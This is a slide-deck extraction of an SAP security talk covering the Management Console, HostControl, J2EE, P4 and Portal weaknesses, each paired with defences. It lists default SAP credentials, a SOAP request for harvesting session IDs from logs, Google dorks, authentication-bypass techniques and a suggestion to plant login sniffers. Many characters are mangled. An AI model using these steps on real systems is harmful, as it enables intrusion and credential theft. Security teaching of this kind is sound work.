  • 91. ICM  (List  of  cri=cal  services)   Some  examples  of  RFC  func%ons:   •  /sap/public/info                                                                        anonymous  info  about  system   •  /sap/public/icf_info/icr_groups                                                  installed  applica%ons   •  /sap/bc/soap/rfc                                                                                                                      remote  RRF  calls   •  /sap/bc/srt/xip/sap                                                                                                    cri%cal  XI  func%ons   •  /sap/bw/Bex                                                                  reading  infoobjects  remotely   •  /sap/bc/bsp/sap/htmlb_samples          test  service  with  vulnerabili%es   •  /sap/bc/gui/sap/its/webgui                                                                                        webgui  access         91  
  • 92. ICM  (Cri=cal  services)   •  Service  /sap/public/info      -­‐  anonymous  info  about  system   •  Can  be  called  anonymously  without  having  user  rights             92  
  • 93. ICM  (Cri=cal  services)   •  Service  /sap/public/icf_info/icr_urlprefix      installed   applica%ons           93  
  • 94. 94   DEMO  17:   ITS  Infdisclose  by  ERPScan  Pentes)ng  Tool  
  • 95. Default  creden=als   They  can  be  used  to  run  RFC  func%ons  remotely       95   USER   PASSWORD   Client   SAP*   06071992,  PASS   000,001,066,Custom   DDIC   19920706   000,001,Custom   TMSADM   PASSWORD,  $1Pawd2&   000   SAPCPIC   ADMIN   000,001   EARLYWATCH   SUPPORT   066  
  • 96. ICM  (Cri=cal  services)   •  Cri%cal  service  sap/bc/soap/rfc     •  RFC  func%ons  are  mapped  to  RFC  authoriza%on  groups   •  Security  of  standard  SOAP  RFC  calls   –  User  must  have  S_RFC  authoriza%on  to  group  of  RFC  func%ons  to   execute  any  call  in  this  group   –  User  must  have  authoriza%ons  which  are  defined  inside  RFC  func%on  to   execute  this  func%on   –  Many  RFC  func%ons  don’t  have  any  special  authoriza%on  checks  so  every   user  can  call  them  by  SOAP  RFC           96  
  • 97. 97   DEMO  18:   SOAP  RFC’s  by  ERPScan  Pentes)ng  Tool  
  • 98. ICM  Service  Defense:  other   •  Disable  or  configure  customized  HTTP  server  header  for  ICM   (sap  note  1329326)   •  Disable  or  configure  disclosure  of  hidden  version    (sap  note  747818)   •  Disable  services  that  are  not  necessary  (note  1498575)     •  Configure  ICF  authoriza%on    for  enabled  services   •  Change  default  passwords         98  
  • 99. 99   SAP  Management  Console  security  
  • 100. SAP  NetWeaver     100   MMC   Service   SAPHostcontrol  
  • 101. SAP  MMC  -­‐  overview   •  MMC  is  installed  by  default  on  port  5<ID>13   •  Used  for  remote  management  of  SAP  servers   •  Command  executed  via  SOAP  interface   •  By  default  SSL  is  not  implemented   •  Administra%on  password  transmi}ed  using  basic  auth  (base64)   •  By  sniffing  this  password  we  can  get  full  control  over  the  server       101  
  • 102. SAP  MMC    afacks   •  Many  a}acks  can  be  implemented  without  authen%ca%on   •  A}acks  can  be  realized  by  sending  SOAP  requests   •  Mostly  it  is  informa%on  disclose  and  denial  of  service   •  Also  OS  command  execu%on       •  All  MMC  a}acks  are  implemented  in  ERPScan  Pentes%ng  Tool       102  
  • 103. SAP  MMC  afacks     ERPScan  Pentes%ng  Tool  modules   •  GET_VERSION_gSOAP.pl   –  Obtaining  version  of  SAP  NetWeaver   •  GET_ENV_gSOAP.pl   –  Obtaining  list  of  SAP  parameters   •  LIST_LOGS_gSOAP.pl   –  Show  the  list  of  log  files  that  can  be  obtained   •  LIST_TRACE_gSOAP.pl   –  Show  the  list  of  Trace  files  that  can  be  obtained  remotely   103  
  • 104. SAP  MMC  afacks     •  GET_LOGS_gSOAP.pl   –  Sow  log  file  details   •  GET_TRACE_gSOAP.pl   –  Show  trace  file  details     104  
  • 105. Advanced  MMC  Afacks   •  SAP  MMC  provides  a  common  framework  for  centralized   system  management   •  Allowing  to  see  the  trace  and  log  messages   •  File  userinterface.log  can  store  JSESSIONID  is  trace  is  ON   •  Using  JSESSIONID  from  logs,  a}acker  can  log  into  SAP  Portal     105  
  • 106. Advanced  MMC  Afacks   <?xml version="1.0"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/ envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema"> <SOAP-ENV:Header> <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/ features/session/"> <enableSession>true</enableSession> </sapsess:Session> </SOAP-ENV:Header> <SOAP-ENV:Body> <ns1:ReadLogFile xmlns:ns1="urn:SAPControl"> <filename>j2ee/cluster/server0/log/system/userinterface.log</ filename> <filter/> <language/> <maxentries>%COUNT%</maxentries> <statecookie>EOF</statecookie> </ns1:ReadLogFile> </SOAP-ENV:Body> </SOAP-ENV:Envelope> 106  
  • 107. 107   DEMO  19:   SAP  MMC  a<acks  by  ERPScan  Pentes)ng  Tool  
  • 108. SAP  MMC-­‐  defense   •  Install  Sapnote  927637   •  Install  Sapnote  1439348  –  informa%on  disclosure  in  MMC   •  Install  Sapnote  1469804  -­‐  Poten%al  DOS  in  sapstartsrv   •  Don’t  use  TRACE_LEVEL  =  3  in  produc%on  systems   •  Delete  traces   •  Disable  methods  service/protectedwebmethods  =  SDEFAULT   •  Disable  access  from  untusted  IP’s   –  service/hfp/acl_file     –  service/hfps/acl_file     h}p://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm         108  
  • 109. 109   SAP  HostControl  security  
  • 110. SAP  NetWeaver     110   MMC   Service   SAPHostcontrol  
  • 111. SAPHostControl   •  Service  listens  on  port  1128/tcp.   •  Very  similar  to  MMC   •  Many  a}acks  can  be  implemented  without  authen%ca%on   •  A}acks  can  be  realized  by  sending  SOAP  requests   •  Vulnerability    in  the  GetDataBaseStatus  functon   •  Parameters  are  passed  to  dbmcli  executable   •  SAP  MaxDB    only         111  
  • 112. 112   DEMO  21:   SAP  HostControl  command  injec)on  by   ERPScan  Pentes)ng  Tool  
  • 113. Defense   •  Install  Sapnote  1341333    -­‐  command  injec%on   •  Disable  access  from  untusted  IP’s               113  
  • 114. 114   SAP  NetWeaver  J2EE  security  
  • 115. SAP  NetWeaver     115  
  • 116. J2EE  Engine   •  Automa%on   of   business   processes   like   ERP,   PLM,   CRM,   SRM   based  ABAP.   •  Integra%on,   collabora%on   and   management   based   on   J2ee   engine:   –  SAP  Portal     –  SAP  PI   –  SAP  XI   –  SAP  Mobile  Infrastructure   –  SAP  Solu=on  Manager         116   Many  SAP  systems  don’t  use  ABAP  stack  
  • 117. J2EE  Plamorm  Architecture                 117  
  • 118. SAP  J2EE  Services   •  General  services   –  SAP  Visual  Admin  (P4)   –  SAP  NetWeaver  HTTP  (webserver)   •  Addi%onal  services   –  SAP  Portal   –  SAP  SDM   –  SAP  SDM  Admin   –  SAP  LogViewer   –  SAP  J2EE  Telnet         118  
  • 119. SAP  Security  storage   119   •  The  SAP  J2EE  Engine  stores  the  database  user  SAP<SID>DB    and   all  configura%ons  in    specific  file   •  The  J2EE  Engine  uses  the  SAP  Java  Cryptography  Toolkit  to   encrypt  the  contents  of  the  secure  store  with  the   tripleDES  algorithm.   •  usrsap<SID>SYSglobalsecuritydataSecStore.proper)es    
  • 122. profit   122   •  We  have  an  encrypted  password   •  We  have  a  key  to  decrypt  it   •  We  got  the  J2EE_ADMIN  and  JDBC  password!  
  • 123. Preven=on   123   •   Install  SAP  note  1619539   •   Restrict  read  access  to  files  SecStore.proper)es  and   SecStore.key  
  • 124. 124   SAP  Visual  Admin  security  
  • 125. SAP  VisualAdmin   125   •  SAP  Visual  Admin  –  remote  tool  for  controlling  J2EE  Engine   •  Use  p4  protocol  –  SAP’s  proprietary   •  By  default  all  data  transmi}ed  in  cleartext   •  P4  can  be  configured  to  use  SSL  to  prevent  MITM   •  Passwords  transmi}ed  by  some  sort  of  encryp%on     •  In  reality  it  is  some  sort  of  Base64  transform  with  known  key          
  • 127. Insecure  password  encryp=on  in  P4   127   /* 87 */ char mask = 43690; /* 88 */ char check = 21845; /* 89 */ char[] result = new char[data.length + 1]; /* */ /* 91 */ for (int i = 0; i < data.length; + +i) { /* 92 */ mask = (char)(mask ^ data[i]); /* 93 */ result[i] = mask; /* */ } /* 95 */ result[data.length] = (char)(mask ^ check); /* */ /* 97 */ return result;
  • 128. Defense   128   •  Use  SSL  for  securing  all  data  transmi›ng  between  server-­‐server   and  server-­‐client  connec%ons   h}p://help.sap.com/saphelp_nwpi71/helpdata/de/14/ ef2940cbf2195de10000000a1550b0/content.htm  
  • 129. 129   SAP  NetWeaver  HTTP  security  
  • 130. SAP  Google  dorks   130   SAP  HTTP  Services  can  be  easily  found  in  internet:   •  inurl:/irj/portal •  inurl:/IciEventService sap •  inurl:/IciEventService/IciEventConf •  inurl:/wsnavigator/jsps/test.jsp •  inurl:/irj/go/km/docs/
  • 131. Informa=on  disclose   131   •  Kernel  or  applica%on  release  and  SP  version.        ERPSCAN-­‐11-­‐023,ERPSCAN-­‐11-­‐027,  DSECRG-­‐00208     •  Applica%on  logs  and  traces        DSECRG-­‐00191,DSECRG-­‐00232     •  Username        ERPSCAN-­‐00231     •  Internal  port  scanning,  Internal  User  bruteforce        ERPSCAN-­‐11-­‐032,DSECRG-­‐00175    
  • 134. User  disclose  ERPSCAN-­‐00231   134                
  • 135. Internal  Port  scan  ERPSCAN-­‐11-­‐032   Host  is  not  alive   135   Port  closed   HTTP  port   SAP  port  
  • 136. Preven=on   136     •       Install  SAP  notes  1548548,1545883,1503856,948851,  1545883   •       Update  the  latest  SAP  notes  every  month   •       Disable  unnecessary  applica%ons    
  • 137. Authen=ca=on   137   •  Declara=ve  authen=ca=on:     •  The  Web  container  (J2EE  Engine)  handles  authen%ca%on   •  Example:    J2EE  Web  applica%ons     •  Programma=c  authen=ca=on.     •  Components  running  on  the  J2EE  Engine  authen%cate   directly  against  the  User  Management  Engine  (UME)  using   the  UME  API.     •  Example:  Web  Dynpro,  Portal  iViews        
  • 138. Declara=ve  authen=ca=on   138   WEB.XML  file  is  stored  in  WEB-­‐INF  directory  of  applica%on  root.     <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web- resource-name> <url-pattern>/admin/*</url-pattern> <http-method>DELETE</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint>
  • 139. Invoker  servlet   139   •  Func%onality  for  rapid  calling  servlets  by  their  class  name     •  Possible  to  call  any  servlet  from  applica%on  even  if  it  is  not   declared  in    WEB.XML     •  Call  it  directly  by  using  /servlet/  directory  and  name  of  the  class   •  Like  this  /servlet/com.sap.admin.Cri%cal.Ac%on  
  • 140. Invoker  servlet  auth  bypass   140   <servlet> <servlet-name>CriticalAction</servlet-name> <servlet-class>com.sap.admin.Critical.Action</servlet- class> </servlet> <servlet-mapping> <servlet-name>CriticalAction</</servlet-name> <url-pattern>/admin/critical</url-pattern> </servlet-mapping <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource-name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint>
  • 141. Preven=on   141     •             Install  latest  updates   •             Disable  feature  by  changing  the  value  of  the  “EnableInvokerServletGlobally”   property  of  the  servlet_jsp  service  on  the  server  nodes  to  “false”.     •           To  enable  invoker  servlet  for  some  applica%ons  check  SAP  note  1445998   •           For  SAP  NetWeaver  Portal,  see  SAP  Note  1467771    
  • 142. 142   DEMO  24:   SAP  NetWeaver  J2EE  invoker  servlet   unauthorized  file  read  
  • 143. 143   DEMO  25:   SAP  NetWeaver  J2EE  invoker  servlet  file  read   +  secstore  decrypt  
  • 144. Verb  Tampering   144   <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web- resource-name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> What  if  we  will  use  HEAD  instead  of  GET  ?  
  • 145. Verb  Tampering  example:  Auth  bypass   •  Administra%ve    interface  for  managing  J2EE  engine  (CTC)   •  Can  be  accessed  remotely     •  Can  run  user  management  ac%ons     -  Create  new  users   -  Assign  them  to  any  Roles   -  Execute  OS  command  on  the  server  side   -  Create  RFC  Des%na%ons   -  Read  RFC  Des%na%ons  info     145   It  means  that  a6acker  get  full  access  to  SAP  and  OS  
  • 146. 146   DEMO  26:   SAP  NetWeaver  J2EE  verb  tampering  user   crea)on  
  • 147. Preven=on   147   Preven%on:   •       Install  SAP  note  1503579,1616259   •       Scan  applica%ons  using  ERPScan  WEB.XML  check  tool  or   manually   •         Secure  WEB.XML  by  dele%ng  all    <h}p-­‐method>   •         Disable  applica%on  that  are  not  necessary  
  • 148. 148   SAP  NetWeaver  Portal  Security    
  • 149. SAP  Portal   •  Point  of  web  access  to  SAP  systems   •  Point  of  web  access  to  other  corporate  systems   •  Way  for  a}ackers  to  get  access  to  SAP  from  the  Internet   •  ~1000  Portals  in  the  world,  according  to  Shodan   •  ~200  Portals  in  the  world  according  to  Google     149  
  • 150. Portal  issues   •  SAP  implements  SSO  using  the  Header  Variable  Login  Module     150   creden%als   check   okay   cookie   A}acker   header_auth   cookie  
  • 151. Knowledge  Management   •  One  of  Portal  modules  is  SAP  Knowledge  Management.   •  KM  is  addi%onal  func%onality   •  It  is  designed  to  aggregate  all  user  documents  and  create  a   knowledge  base   •  Like  Sharepoint   •  An  a}acker  can:   –  Get  read  access  to  cri%cal  documents   –  Create  phishing  pages  which  will  steal  logins  and  passwords.   151  
  • 152. KM  Documents   •  KM  by  default  can  be  found  here  /irj/go/km/naviga%on   •  Some%mes  Guest  user  can  have  access  to  KM   •  You  can  test  listed  folders:   –  /irj/go/km/naviga%on/userhome/   –  /irj/go/km/naviga%on/docs/   –  /irj/go/km/naviga%on/documents/Public  Documents/   –  /irj/go/km/naviga%on/Entry  Points/Public  Documents/   152  
  • 153. KM  Documents   •  Some%mes  it  is  possible  to  put  documents  into  shared  folders   •  Like  this  folder  /irj/go/km/docs/documents/Public  Documents/   •  You  can  upload  HTML  file  with  login  sniffer  or  cookie  sniffer   153  
  • 154. SAP  Security   154   Ques)ons?  
  • 155. We  devote  a<en)on  to  the  requirements  of  our   customers  and  prospects,  and  constantly  improve  our   product.  If  you  presume  that  our  scanner  lacks  a   par)cular  func)on,  you  can  e-­‐mail  us  or  give  us  a  call.  We   will  be  glad  to  consider  your  sugges)ons  for  the  next   releases  or  monthly  updates.   155   web:  www.erpscan.com   e-­‐mail:  info@erpscan.com,  sales@erpscan.com   Conclusion